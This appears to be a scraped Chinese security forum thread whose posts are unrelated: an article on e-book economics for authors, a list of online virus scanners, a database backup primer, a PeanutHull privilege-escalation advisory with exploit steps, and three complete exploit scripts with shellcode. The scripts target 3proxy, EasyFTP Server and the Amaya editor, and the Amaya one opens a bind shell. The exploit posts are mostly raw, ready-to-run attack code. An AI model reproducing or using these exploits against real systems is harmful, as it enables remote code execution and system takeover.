返回列表 发帖

华尔街日报:电子书令作家陷入窘境

导读:10月6日消息,华尔街日报今日发表题为《进入电子书时代,作家愁眉不展》的文章,称电子图书带来的新盈利模式令作家陷入了窘境。以下是全文:  今年,当著作经纪人莎拉•亚克(Sarah Yake)为基尔斯滕•凯斯切克(Kirsten Kaschock)的小说处女作《娴熟》(Sleight)寻找下家时,她满心以为签下纽约的顶级出版社是十拿九稳的事情。
  从2001起便在佐治亚大学(University of Georgia)英语系任教的拉舒腊(Jed Rasula)评论道,凯斯切克的作品是过去十多年来我见过的最出色的,我认为她签下纽约的出版社毫无问题。
  但纽约的几家主要出版商都没有签下《娴熟》──一部描写两姐妹接受某种虚构的艺术形式的培训的小说。明尼阿波利斯(Minneapolis)的小规模独立出版商咖啡馆出版社(Coffee House Press)打算出版这部小说,向凯斯切克预付了3500美元的稿酬,这个数额只是大型出版社通常预付稿酬的一个小零头。
  一直以来,小说作家的作品想要得到顶级出版社的青睐并非易事。而打乱图书产业传统盈利模式的数字出版革命更是对文学作家的事业产生了巨大的影响。
  由于定价远低于实体书,电子图书带给出版商的收益远远少于传统书籍。大型零售商的进书量也越来越少。上述现象造成的结果就是,出版商审核通过的出版计划和签约的新作家数量都大大减少。这些出版公司曾经培育出了几代杰出的美国小说作家。就算小说最终出版,作者拿到的预付稿酬也比以前大大减少。
  著名的著作经纪人西尔弗伯格(Ira Silverberg)说,预付稿酬减少,新书也不如以前多了。我们都想努力搞清楚,在经历了数字出版革命的搅局之后,图书出版业的未来走向会是怎样。
  在很多出版商和经纪人看来,廉价的数字音乐下载风靡之后,乐队越来越难以只靠和唱片公司签署的合约生存,同样,在电子图书被广泛接受之后,没有几位文学作家可以单靠写书养活自己了。塔利斯/达布尔迪(Nan A.Talese/Doubleday)出版公司出版过伊恩•麦克尤恩(Ian McEwan)、玛格丽特•阿特伍德(Margaret Atwood)以及约翰•皮普金(John Pipkin)等著名作家的作品,其经营者塔利斯(Nan Talese)表示,一个作家想要生存,得有兼职收入来源。
  在某些情况下,独立出版商会瞄准这一契机,签下那些很有前景的新人小说作家。但通常这些小型出版社的预付稿酬只有1,000至5,000美元。而在过去,那些信誉卓著的大型出版社给小说家处女作的预付稿酬通常有5万至10万美元之巨。
  电子图书带来的新盈利模式切切实实地令作家陷入了窘境:以前,每售出一本28美元的实体书,出版社能拿到一半的收入,即14美元,作者提15%,即4.20美元。而根据目前很多的电子书出版协议,一本售价为12.99美元的电子书,出版社提70%的收入,即9.09美元,作者通常提25%左右的收入,只有2.27美元。
  两相比较的结果就是:作者从售出的每一本电子图书中获得的收益,仅略高于他/她从实体书销售中所获收益的一半。
  上述情况发生的背景是图书销售不断下滑的现状。互联网提供的看似无尽的娱乐选择已经大大蚕食了人们读书的时间。当然,疲软的经济也是一个因素。
  著名作家盖伊口塔利斯(Gay Talese)的夫人说,当年那种读者热捧刚出道的塞林格(JD Salinger)和菲利普口罗斯(Philip Roth)的景象如今是看不到了。
  据图书市场分析员格列柯(Albert Greco)透露,消费类图书的销售在2008年达到顶峰,为16.3亿册,预计今年这一数字将会降至14.7亿册,到2012年还会更低,降到14.3亿册。
  而电子图书的销售则呈爆炸式增长。目前,电子书的销售收入约占图书总体销售收入的8%,一年前这一数字还只有3%至5%。据出版业顾问肖特金(Mike Shatzkin)估计,到2012年底,电子书的销量将占到20%至25%。而格列柯则预计,电子书的销量最终将超过实体书。
  一些图书业专家指出,电子图书较低的售价最终可能会拉动图书的整体销售,但这是否能弥补实体书销售收入的下滑还有待观察。

 

您可能还想看的主题:

精通黑客编程电子书

黑客防线0906期【电子书】

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

花生壳本地权限提升漏洞的分析研究
受影响的产品:
[/quote]
[quote]PeanutHull <= 3.0.1.0
综述:
网域科技号称全球最大的DDNS(动态域名)提供商。 花生壳是它们提供的客户端 详细信息,可以查看http://www.oray.net
具体细节:
该漏洞主要是由于花生壳客户端系统图标没有正确的丢弃SYSTEM权限。
本地非特权用户可以通过访问系统图标来以SYSTEM权限执行任意命令。
Exploit: 1. 双击任务栏花生壳图标,打开花生壳窗口 2. 单击“帮助”,打开“论坛” 3. 在跳出的IE地址栏中输入C: 4. 切换到%WINDIR%System32 5. 单击打开cmd.exe 6. 此时打开的cmd.exe以SYSTEM权限运行
成功利用此漏洞可以获取SYSTEM权限
厂商回复:
2005.07.13 通过EMAIL通知厂商。 2005.07.14 厂商回复称将在3.0正式版中修复这个问题 2005.07.20 花生壳3.0正式版发布 2005.07.20 此公告发布
更新:
Secunia在验证此漏洞时的发现,最新的3.0.1.0版依然存在此缺陷。 本地用户可以通过发送SW_SHOW消息来调出花生壳窗口,进而提升权限。
2005.07.21 测试代码公布
Exploit: http://secway.org/exploit/PeanutHull_Local.rar 或者见附件
解决方案: 暂无 请时刻关注网域科技的补丁 PeanutHull_Local.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

40个在线杀毒网站
1.BitDefender在线杀毒  http://www.bitdefender.com/scan8/ie.html  2.熊猫卫士在线杀毒  http://www.pandasoftware.com/com/cn/ (点左下角免费在线查毒)  3.光华在线杀毒  http://viruschina.com/free/freevirus.asp  4.Dr.Web在线杀毒  http://www.drweb.com/online  5.CA eTrust在线杀毒  http://www3.ca.com/securityadvisor/virusinfo/scan.aspx  6.RAV Antivirus在线杀毒  http://www.ravantivirus.com/scan/  7. VirusChaser在线杀毒bbs  http://www.vccn.com.cn/webscan  8.GeCAD RAV在线杀毒  http://www.ravantivirus.com/scan/indexn.php  9. ClamAV在线杀毒  http://test-clamav.power-netz.de  10.Kaspersky在线杀毒(针对单个文件或者是单个程序的检测)  http://www.kaspersky.com/scanforvirus  11.Kaspersky Anti-Virus Web Scanner 在线杀毒  http://www.kaspersky.com/beta?product=161744315  12.VBA32在线杀毒中  http://www.anti-virus.by/en/index.html  13.东方卫士在线杀毒  http://www.i110.com/dfvsonline/dfvsonline.asp  14.NORMAN在线杀毒  http://www.norman.com/zh-hk  15.趋势科技在线查毒  http://www.trendmicro.com.cn/housecall/start_corp.asp  16.NOD32在线杀毒  http://www.nod32.com/home/home.htm  17.FORTINET在线杀毒  http://www.fortinet.com/FortiGuardCenter/virus_scanner.html  18.AVG在线杀毒  http://www.grisoft.com/doc/1  19.F-PROT在线杀毒  http://www.f-prot.com  20.AVAST在线杀毒  http://onlinescan.avast.com  21.ARCABIT在线杀毒  http://www.arcabit.com/ (点击右边中间 online scaner)  22.AntiVir在线杀毒  http://www.antivir.de/en  23.江民在线查毒  http://online.jiangmin.com/chadu.asp  24.朝华·安博士在线杀毒中文  http://www.zvc.com.cn/vco_start.asp  25.瑞星在线查毒  http://online.rising.com.cn/ravonline/RavSoft/Rav.asp  26.金山毒霸在线查毒  http://scan.kingsoft.com  27.KILL在线杀毒  http://www.kill.com.cn/product/webscan/718.asp  28.E-Trust  http://www3.ca.com/securityadvisor/virusinfo/scan.aspx  29.GFi 木马在线查杀  http://www.windowsecurity.com/trojanscan/trojanscan.asp  30.QQ病毒腾讯瑞星在线杀毒  http://club.qq.com/virus/index.htm  31.ewido online scanner beta 在线杀毒  http://www.ewido.net/en/onlinescan/  32.安铁诺在线杀毒  http://www.sanlen.com/onlinekill/  33.网易在线木马专杀中  http://tech.163.com/Other/virus/muma.html  34.间谍程序扫描  http://www.pestscan.com/Scan.asp  35.VirusTota在线查毒  http://www.virustotal.com/flash/index_en.html  36.Jotti Online Malware Scan  http://virusscan.jotti.org  37.诺顿在线安全检测  http://security.symantec.com/sscv6/home.asp?langid=cs&amp;venid=sym&amp;plfid=23&amp;pkj=DQLYVDKDNVRQQCZUFMQ  38.天网在线安全检测  http://pfw.sky.net.cn/news/info/list.php?sessid=&amp;sortid=17  39.QQ安全中心检测  http://safe.qq.com  40、霏凡软件站- 多引擎病毒在线扫描  http://www.crsky.com/help/Virus.htm


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

3proxy 0.5.3g logurl远程缓冲区溢出利用
#!/usr/bin/perl#This module exploits a stack overflow in 3Proxy prior to 0.5.3h, and 0.6b-devel before 20070413. By sending a long host header in HTTP GET request to the default port of # 3128, a remote attacker could overflow a buffer and execute arbitrary code.#                         # Marcin Kozlowski based on vade79 PoC##IO::Socket for network connectionsuse IO::Socket;#the ip address is our first commandline argument also known as ARGV[0] in Perl$ip = $ARGV[0];#our nopsled$nopsled = "x90"x36;$A = "A" x 1064;$B = "B" x 999;#execute calc.exe#$payload = "x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02"."xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48"."x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4"."xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12"."x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69"."x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6"."x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5"."x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21"."x61xddx0ex4d";#our extended instruction pointer which we use to overwrite the remote eip#remeber to make it little-endian format$eip = "x72x93xabx71"; #call esp#we construct our full attackstring here$attackstring = "GET /".$A.$eip.$nopsled.$payload." HTTP/1.0
Host: ".$B."

";print $attackstring;#view a message if no ip address is givenif(!$ip){die "You have to provide the target's IP Address..
";}#the remote port to connect to$port = '3128';#the connection protocol to use$protocol = 'tcp';#create the actual network connection#and print an error message if it's not possible to create a socket$socket = IO::Socket::INET->new(PeerAddr=>$ip,                                PeerPort=>$port,                                Proto=>$protocol,                                Timeout=>'1') || die "Could not create socket
";#send the payload to the remote computerprint $socket $attackstring;#close the connection


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

EasyFtp-Server-v1.7.0.2远程溢出Exploit
# Exploit Title: Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit
# Date: 18-02-2010
# Author: ThE g0bL!N
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Code :
#!/usr/bin/python
import sys
import socket
import base64
  
if len(sys.argv) != 4:
print "
****************************************************"
print "
  • Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit
    "
  • print "
  • Usage : ./sploit.py <target_ip> <user> <password>
    "
  • print "
  • Example : ./sploit.py 192.168.1.3 anonymous w00t
    "
  • print "*****************************************************"
    sys.exit(0)
      
    user = sys.argv[2]
    pwd = sys.argv[3]
    auth = base64.b64encode(user+":"+pwd)
      
    # win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub
    shellcode=(
    "x44x7Ax32x37x44x7Ax32x37"
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
    "x42x50x42x30x42x30x4bx58x45x34x4ex43x4bx38x4ex47"
    "x45x30x4ax37x41x50x4fx4ex4bx58x4fx44x4ax41x4bx48"
    "x4fx45x42x52x41x30x4bx4ex49x44x4bx58x46x53x4bx58"
    "x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"
    "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
    "x46x4fx4bx53x46x45x46x32x46x30x45x37x45x4ex4bx58"
    "x4fx45x46x42x41x30x4bx4ex48x56x4bx48x4ex30x4bx54"
    "x4bx58x4fx45x4ex41x41x50x4bx4ex4bx48x4ex51x4bx58"
    "x41x50x4bx4ex49x58x4ex35x46x32x46x50x43x4cx41x33"
    "x42x4cx46x56x4bx48x42x54x42x43x45x58x42x4cx4ax57"
    "x4ex50x4bx58x42x54x4ex50x4bx48x42x57x4ex51x4dx4a"
    "x4bx38x4ax56x4ax30x4bx4ex49x30x4bx38x42x48x42x4b"
    "x42x50x42x30x42x50x4bx48x4ax36x4ex53x4fx45x41x43"
    "x48x4fx42x46x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
    "x42x35x4ax56x50x57x4ax4dx44x4ex43x37x4ax56x4ax59"
    "x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x36x41x46"
    "x4ex36x43x36x42x50x5a")
      
    egghunter=(
    "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
    "xefxb8x44x7Ax32x37x8bxfaxafx75xeaxafx75xe7xffxe7")
      
    buf = "x61"*268
    buf += "xF0x69x83x7C" #CALL ESP XP SP3
    buf += "x63"*8
    buf += egghunter
      
    head = "GET /list.html?path="+buf+" HTTP/1.1
    "
    head += "Host: "+shellcode+"
    "
    head += "Authorization: Basic "+auth+"
    "
      
    try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],8080))
    s.send(head + "
    ")
    print "[x] Payload sended waiting for shellcode..."
    s.close()
    except:
    print "Error!"




















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Amaya Web Editor 11远程SEH溢出Exploit
    #!/usr/bin/perl## Title: Amaya Web Editor 11 Remote SEH Overwrite Exploit## Summary: Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web.## Product web page: http://www.w3.org/Amaya/## Tested on Microsoft Windows XP Professional SP2 (English)### Exploit coded by Gjoko 'LiquidWorm' Krstic## liquidworm [t00t] gmail [w00t] com## 30.01.2009##------------------------------------------------------------------## lqwrm@zeroscience:~$ telnet 192.168.1.101 6161# Trying 192.168.1.101...# Connected to 192.168.1.101.# Escape character is '^]'.# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:Program FilesAmayaWindowsWXin>dir#  Volume in drive C is System#  Volume Serial Number is D484-8540##  Directory of C:Program FilesAmayaWindowsWXin## 29.01.2009  19:27    <DIR>          .# 29.01.2009  19:27    <DIR>          ..# 16.12.2008  14:44         5.816.320 amaya.exe# 16.12.2008  14:41         1.290.240 thotprinter.dll# 19.08.2008  11:02           135.168 wxbase28u_net_vc_custom.dll# 19.08.2008  11:01         1.220.608 wxbase28u_vc_custom.dll# 19.08.2008  11:02           135.168 wxbase28u_xml_vc_custom.dll# 19.08.2008  11:03           741.376 wxmsw28u_adv_vc_custom.dll# 19.08.2008  11:03           286.720 wxmsw28u_aui_vc_custom.dll# 19.08.2008  11:01         3.018.752 wxmsw28u_core_vc_custom.dll# 19.08.2008  11:02            49.152 wxmsw28u_gl_vc_custom.dll# 19.08.2008  11:02           524.288 wxmsw28u_html_vc_custom.dll# 19.08.2008  11:03           593.920 wxmsw28u_xrc_vc_custom.dll#              11 File(s)     13.811.712 bytes#               2 Dir(s)   7.520.141.312 bytes free## C:Program FilesAmayaWindowsWXin>##------------------------------------------------------------------my $start = "<html>" . "
    " . '<bdo dir="' . "
    ";my $junk = "x41" x 10556;my $seh = "xc5x87x85x7c"; #0x7c8587c5     pop pop ret kernel32.dll - (SE handler) - EIP#0x7c941eed     jmp esp kernel32.dll#0x7c836960      call esp kernel32.dll#0x7c85d568      call esp kernell32.dll# ...my $next_seh = "xebx06x90x90"; #0x909006eb     jmp+0x06 - (Pointer to next SEH record)my $nop = "x90" x 50;# win32_bind -  EXITFUNC=seh LPORT=6161 Size=344 Encoder=PexFnstenvSub http://metasploit.commy $sc = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb0"."x6bx3ax1ex83xebxfcxe2xf4x4cx01xd1x53x58x92xc5xe1"."x4fx0bxb1x72x94x4fxb1x5bx8cxe0x46x1bxc8x6axd5x95"."xffx73xb1x41x90x6axd1x57x3bx5fxb1x1fx5ex5axfax87"."x1cxefxfax6axb7xaaxf0x13xb1xa9xd1xeax8bx3fx1ex36"."xc5x8exb1x41x94x6axd1x78x3bx67x71x95xefx77x3bxf5"."xb3x47xb1x97xdcx4fx26x7fx73x5axe1x7ax3bx28x0ax95"."xf0x67xb1x6exacxc6xb1x5exb8x35x52x90xfex65xd6x4e"."x4fxbdx5cx4dxd6x03x09x2cxd8x1cx49x2cxefx3fxc5xce"."xd8xa0xd7xe2x8bx3bxc5xc8xefxe2xdfx78x31x86x32x1c"."xe5x01x38xe1x60x03xe3x17x45xc6x6dxe1x66x38x69x4d"."xe3x38x79x4dxf3x38xc5xcexd6x03x22x0fxd6x38xb3xff"."x25x03x9ex04xc0xacx6dxe1x66x01x2ax4fxe5x94xeax76"."x14xc6x14xf7xe7x94xecx4dxe5x94xeax76x55x22xbcx57"."xe7x94xecx4exe4x3fx6fxe1x60xf8x52xf9xc9xadx43x49"."x4fxbdx6fxe1x60x0dx50x7axd6x03x59x73x39x8ex50x4e"."xe9x42xf6x97x57x01x7ex97x52x5axfaxedx1ax95x78x33"."x4ex29x16x8dx3dx11x02xb5x1bxc0x52x6cx4exd8x2cxe1"."xc5x2fxc5xc8xebx3cx68x4fxe1x3ax50x1fxe1x3ax6fx4f"."x4fxbbx52xb3x69x6exf4x4dx4fxbdx50xe1x4fx5cxc5xce"."x3bx3cxc6x9dx74x0fxc5xc8xe2x94xeax76x40xe1x3ex41"."xe3x94xecxe1x60x6bx3ax1e";my $end = '">' . "
    " . "t00t</bdo>" . "
    " . "</html>";my $file= "Slumdog_Millionaire.html";$payload = "$start" . "$junk" . "$next_seh" . "$seh" . "$nop" . "$sc " . "$end";open (exploit, ">./$file") or die "Can't open $file: $!";print exploit "$payload";close (exploit);print "       
    - $file successfully created!
    ";


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    ASP高级技术-常用的数据库备份类型有哪些?
    常用的数据库备份类型有哪些?
    对数据库的备份是网站管理人员的必修课,那么常用的数据库备份方式有哪些呢?应如何选择?

    数据库备份有四种类型,分别应用于不同的场合,下面简要介绍一下。
    1、完全备份
    这是大多数人常用的方式,它可以备份整个数据库,包含用户表、系统表、索引、视图和存储过程等所有数据库对象。但它需要花费更多的时间和空间,所以,一般推荐一周做一次完全备份。
    2、事务日志备份
    事务日志是一个单独的文件,它记录数据库的改变,备份的时候只需要复制自上次备份以来对数据库所做的改变,所以只需要很少的时间。为了使数据库具有鲁棒性,推荐每小时甚至更频繁的备份事务日志。
    3、差异备份
    也叫增量备份。它是只备份数据库一部分的另一种方法,它不使用事务日志,相反,它使用整个数据库的一种新映象。它比最初的完全备份小,因为它只包含自上次完全备份以来所改变的数据库。它的优点是存储和恢复速度快。推荐每天做一次差异备份。
    4、文件备份
    数据库可以由硬盘上的许多文件构成。如果这个数据库非常大,并且一个晚上也不能将它备份完,那么可以使用文件备份每晚备份数据库的一部分。由于一般情况下数据库不会大到必须使用多个文件存储,所以这种备份不是很常用。


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表